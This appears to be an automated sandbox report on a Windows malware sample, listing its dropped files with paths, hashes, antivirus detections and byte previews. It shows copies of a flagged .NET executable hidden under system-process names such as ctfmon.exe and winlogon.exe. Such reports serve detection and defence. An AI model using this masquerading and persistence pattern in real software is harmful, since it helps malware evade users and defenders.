Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with very long lines (866), with no line terminators
Category:	dropped
Size (bytes):	866
Entropy (8bit):	5.905631528152563
Encrypted:	false
SSDEEP:	12:+2JPUV+uSKSlYra2qHx8XYkJhyz8h2mmCwrjGdn6+bsP1lupNCy2h2B7q04+hhtH:+EM/SSrpQXgDh2vCkGxRKaqP+qm
MD5:	8F8F059AE96C76D9845D4A82592932CE
SHA1:	EB5D82449DD09CE7374E1592337085C6B74EC61F
SHA-256:	C5C0B3928BDD019DDBBC5C7588901226BAEAF17C4B159E44E82A1D9B44B87AC2
SHA-512:	649DDCD71724EBD360014D6D220FF7384655923C06F5DCB4B8259468B9E7A6BE93D9CCBCA04E6A831399D87216B37A0DA3E5E1FD9512A66AD62AC8018349DE20
Malicious:	false
Preview:	ek3ysdjmrq6YOPpzf9ToEeLqmOwRcBAgH7MbsRWNp4GELOI0ZNNOdlxAZMLdrSKpqZRQDNHOnF8KXHfYG61PyvCfKMCfF2gXtaXv71xMF8lXnmmRrxXub515XwF0KmIujkb7tubOJoJzJo2ijuySfv6xjcYKw6Bdz0yCLpi6WIlwwBvs4hQay0PxonYQWQcMmp9T0zW4L16WJKBhrqQOplp9lAYiQSjFqZJGCc1ELVO643oel1jq9OgA9Aszbyo3R0puA4eOyLCUXtFrW47Zt3Gc3JHBuBnXrUoDN4eqWU2xLMnQ5Adg0OKYtN00xcewipmCEBebaQDZASRqf1GtiGgcKPTADn33zFPfjkL3fBGkLuXb5JV5WuObJK1yrdYxXKj5CwH4qNNgA5RZ12E3R7hE1yVZtWMCnTNBLcYJCaPIgsaN2b7zZefZmfDOasLTAL2qsQOYd511sYhJXHgRZXnIyxYqYKsTP5IUzufmNiVdnoqO740SL34niu241i9SNhlxQMTnm4E1BJfJGJseUZIVAewF1kuoiCQGC38ulNqRzDmZPsxszf8xYQwvaOwCKaT83YHNL83Gt0g72W0IwCyCEdrwHMTWbnHYtng0lkh1m1Dity3DYnQHlR4arVF8ogpGtHNO09gLf7ZMZJCSSQ8xX9xcsFJQfiNGM7ymloNYHEmn1sAhSwpYh2tuTugu0Qq6uSAcVaroCjqSWJlAFl7s2yiTODS0Ici0Yq3iriM2FBV8MaYKJfpOS8E5uqNRH0fkBz4pQCSgZFm1dkHxpIqnxTiam7yBU4uOfv6Xgs3HMIyNVNcJiam9K2xrQdDSNRLeUYVrnuQ6OjbofVEZepc4SuEn8PGCol

C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.15172744419513
Encrypted:	false
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
MD5:	13AEDA86AAFDE4051D7CA9280DAC9A67
SHA1:	FD4A6168C79C28D6E25BE7C799FFD25C2DBD69D0
SHA-256:	01EF75F76AE452476B1DE15A3238617F33C4B685E5BB423DE49F34F44B0A0111
SHA-512:	DDFC9A2A5A2F3B83023EECF4053DE1930EBF9486D1CFF869AB6D2199C5978926B2C4A6468358C627F4CFF16A235C8D23B98711D8B3BF608ED03F4E4D7D7D0194
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Windows Mail\26c12092da979c

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	62
Entropy (8bit):	5.111217882862837
Encrypted:	false
SSDEEP:	3:FHjaWTUtHsVbcQU+lsCn:ljaUUtMrU+lsCn
MD5:	E0A083C648AFCDF41C129B36D9C95D6E
SHA1:	472911DDA5A27E53D9046B376BF580D6206CC0FD
SHA-256:	FE8D661CA066071DD5A5887FE67ECA5EEAB424E5D8E4DC33C520F652A59D5E03
SHA-512:	A2D143CF62BF4F576D19DE68ED9432C3489B5015AA7FC98A021A17DD902B6B1A3485A20877FD14DF8B215E3DE59AD144936F416DA1E80C0590B58C54C4B62D44
Malicious:	false
Preview:	u5r2Sah4VNtWfGv1sv16DnV2WBV1Muja6Wcp3n5NSrkIIlh1gXdFsj9GjzgREq

C:\Program Files\Windows Mail\ctfmon.exe

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.15172744419513
Encrypted:	false
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
MD5:	13AEDA86AAFDE4051D7CA9280DAC9A67
SHA1:	FD4A6168C79C28D6E25BE7C799FFD25C2DBD69D0
SHA-256:	01EF75F76AE452476B1DE15A3238617F33C4B685E5BB423DE49F34F44B0A0111
SHA-512:	DDFC9A2A5A2F3B83023EECF4053DE1930EBF9486D1CFF869AB6D2199C5978926B2C4A6468358C627F4CFF16A235C8D23B98711D8B3BF608ED03F4E4D7D7D0194
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Windows Mail\ctfmon.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\Links\6dd19aba3e2428

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with very long lines (322), with no line terminators
Category:	dropped
Size (bytes):	322
Entropy (8bit):	5.807897371147483
Encrypted:	false
SSDEEP:	6:eXm+cyqA/8uSOl2AiHWhVyhpAmBORB8xf9m0QR5TF3OXOKGX68EGn:f+cyqA0dORiHmVyJYPsUpDAXOKm6VGn
MD5:	953538AB48AF00EBA654812177D801AB
SHA1:	381D770FD42E7581313DF7EDF70E99809E9C3BC8
SHA-256:	1A3D0571AD39B566102205E149D2F69EE2C84C9DD8EF50DA845FF8D2E3CEC6DD
SHA-512:	6E3FA5C01EE8E9C757FBB730D443A873BFDF9E31332E4176D7C1D42F8BAEBBFCE1FCB3998AC6C9EF165327FBE6D2EF10412C97C8F3A556FDFD596E47F8332341
Malicious:	false
Preview:	yPs32HBddi1Yvna903zxS0Yz8B525yyoFhYYoWKI8wkDCVCchv0igAA71251LIiouMSOOCVetqygQVwm8dVK8PHFgahvbS6zO5T0DyOeZWzzLergFS3sxYqeFMrxfkCbu9RUC6jKO0umaR4BtApJZOCzPyv0Gb9zTXFMMXeJssd6nDDxSpEe43Bf6cENLtEx14SCMszVggaquGMLv8haXf5ZWjPuSQ78oqFsuAkj0s7YcVv0Q3bNLnaV93qmcEDPicCEAdauX7johh6AyYeZzuxAPtt1U8GwprzASqzwcr0NDvxc6pyDjnayoByQtjaZ0x

C:\Users\Default\Links\ApplicationFrameHost.exe

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.15172744419513
Encrypted:	false
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
MD5:	13AEDA86AAFDE4051D7CA9280DAC9A67
SHA1:	FD4A6168C79C28D6E25BE7C799FFD25C2DBD69D0
SHA-256:	01EF75F76AE452476B1DE15A3238617F33C4B685E5BB423DE49F34F44B0A0111
SHA-512:	DDFC9A2A5A2F3B83023EECF4053DE1930EBF9486D1CFF869AB6D2199C5978926B2C4A6468358C627F4CFF16A235C8D23B98711D8B3BF608ED03F4E4D7D7D0194
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Default\Links\ApplicationFrameHost.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Default\Saved Games\2e26acd4fd0504

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	180
Entropy (8bit):	5.70747644968845
Encrypted:	false
SSDEEP:	3:nKzhYH7yTJhxn1NS9kWmnOQou7Krk2iaFtsIeF2m8EfnYVKkaWUbZvn:nCCbES9kWpPu7c5XF30ejVKkTUb1
MD5:	2709CCFAC16EC492A83D8B6FFB70D0D7
SHA1:	85E88ABF6A53C82F58A936FEDFAAB22CACF6C592
SHA-256:	177CFAC4C5CE63D69159A61483FF6D6738EBEF67464BC6BA154B46368BE0632B
SHA-512:	2C6810E6A85FAC71888CCECAC918CAD148D4E402171541377D91D7FA32BF92CBD6E5BFCB2E979DC332AC60A3332CFD80F93DBCAF30488AE13A260302732414FC
Malicious:	false
Preview:	9L7vPRSWDfEfJF82iLbzwuWOsMVrbFUX8GWnXDVBhqPMZB5EVsLET7XOzsCC5k57KrgCtVee0ZSFfKzrRQVs4QDAsHypBSG6vSBre2VANqN3oSto3UvoPMC4ngUlgzdiTWUMIHNY5UfOCKVaYJvqhbrjPHE8iteXMpkS7gfwHWs4qy1dK3MW

C:\Users\Default\Saved Games\QeWHGGzCXwoQygZUiDI.exe

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.15172744419513
Encrypted:	false
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
MD5:	13AEDA86AAFDE4051D7CA9280DAC9A67
SHA1:	FD4A6168C79C28D6E25BE7C799FFD25C2DBD69D0
SHA-256:	01EF75F76AE452476B1DE15A3238617F33C4B685E5BB423DE49F34F44B0A0111
SHA-512:	DDFC9A2A5A2F3B83023EECF4053DE1930EBF9486D1CFF869AB6D2199C5978926B2C4A6468358C627F4CFF16A235C8D23B98711D8B3BF608ED03F4E4D7D7D0194
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Default\Saved Games\QeWHGGzCXwoQygZUiDI.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\Public\AccountPictures\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	258
Entropy (8bit):	5.789826565740592
Encrypted:	false
SSDEEP:	6:W6u2Kxvco45RZ469+y8KFEt4nxP6eRSweM6NrkGm:WDvxru/4TDBtUP6eRSRMDN
MD5:	F419AE9D28FB6080EEFD6FADC72FEB2F
SHA1:	B8E3DE74D249D722E6F898AD7FBFEB2870114AAD
SHA-256:	3730122F3C7B2E520C0DCAA3872953AE637C0F9F3B75703E90B79DC6DF035990
SHA-512:	ED3265925255B079E6DDA8415C381F9B206E3A10A2C44D4A900F9B9534C05D55E6D640F125FD19A3F6319432C1D1153B0A2AEDAFDA9660530AA6AE743685109E
Malicious:	false
Preview:	0M0IBXjDc2n8jKsw2bPkxogHSZnrnMjet1fgDiwd3HbUsGN0K22fvcbLptzlu2ZPSJOroLtTpwqqNLYMLwhvUEsQZU1TsKtBrLCj1fM8Ii09vv8dVnZ7Un5Ob7SUUaleCp8CJyUqkjnvOsfoVX8FuwrEPyI3N1os7V7Gw5UgTtWvAJ9sco86bftP74wUqbct44x2vY1ZDbwBa6DGyZaj2rQbmrI2J9z1Rm0FVH7Ewi3AtsyB0pgRA20NoWQDP9QDl4

C:\Users\Public\AccountPictures\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1433600
Entropy (8bit):	7.15172744419513
Encrypted:	false
SSDEEP:	24576:Lw/d/t+9SDGMoRNkj63uYnqzW1yqCc/CfVsdEYXHo1o9edFt4k:M/d/HP6+Ynb18Kfdx3IoIt
MD5:	13AEDA86AAFDE4051D7CA9280DAC9A67
SHA1:	FD4A6168C79C28D6E25BE7C799FFD25C2DBD69D0
SHA-256:	01EF75F76AE452476B1DE15A3238617F33C4B685E5BB423DE49F34F44B0A0111
SHA-512:	DDFC9A2A5A2F3B83023EECF4053DE1930EBF9486D1CFF869AB6D2199C5978926B2C4A6468358C627F4CFF16A235C8D23B98711D8B3BF608ED03F4E4D7D7D0194
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^.... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...d.... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\AccountPictures\RuntimeBroker.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ApplicationFrameHost.exe.log

Download File

Process:	C:\Users\Default\Links\ApplicationFrameHost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1673
Entropy (8bit):	5.358592927981826
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHj:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1D
MD5:	F291C90FAC67ABE67847C0904F5FF473
SHA1:	62116C0BF75FB9983D24B6E8D4BBA1A46272BD68
SHA-256:	7B7D839D62C6ACC64FEA99510F7C9BD1D71008DC7573ECE96474BC24F5876D1F
SHA-512:	B99CA9739B59E679B00777DD0C2F77CB0258F79959D0B99BA10139B6C3C3D692859196101BCFC1919933F083153AA2D72976E514F725F909CA2EDD2397C05F9A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\B9exXW7c3t.exe.log

Download File

Process:	C:\Users\user\Desktop\B9exXW7c3t.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1915
Entropy (8bit):	5.363869398054153
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1Gq2
MD5:	5D3E8414C47C0F4A064FA0043789EC3E
SHA1:	CF7FC44D13EA93E644AC81C5FE61D6C8EDFA41B0
SHA-256:	4FDFF52E159C9D420E13E429CCD2B40025A0110AD84DC357BE17E21654BEEBC7
SHA-512:	74D567BBBA09EDF55D2422653F6647DCFBA8EF6CA0D4DBEBD91E3CA9B3A278C99FA52832EDF823F293C416053727D0CF15F878EC1278E62524DA1513DA4AC6AF
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QeWHGGzCXwoQygZUiDI.exe.log

Download File

Process:	C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1673
Entropy (8bit):	5.358592927981826
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpvJHVHj:iq+wmj0qCYqGSI6oPtzHeqKkhtpB1D
MD5:	F291C90FAC67ABE67847C0904F5FF473
SHA1:	62116C0BF75FB9983D24B6E8D4BBA1A46272BD68
SHA-256:	7B7D839D62C6ACC64FEA99510F7C9BD1D71008DC7573ECE96474BC24F5876D1F
SHA-512:	B99CA9739B59E679B00777DD0C2F77CB0258F79959D0B99BA10139B6C3C3D692859196101BCFC1919933F083153AA2D72976E514F725F909CA2EDD2397C05F9A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

Download File

Process:	C:\Users\Public\AccountPictures\RuntimeBroker.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ctfmon.exe.log

Download File

Process:	C:\Program Files\Windows Mail\ctfmon.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\winlogon.exe.log

Download File

Process:	C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
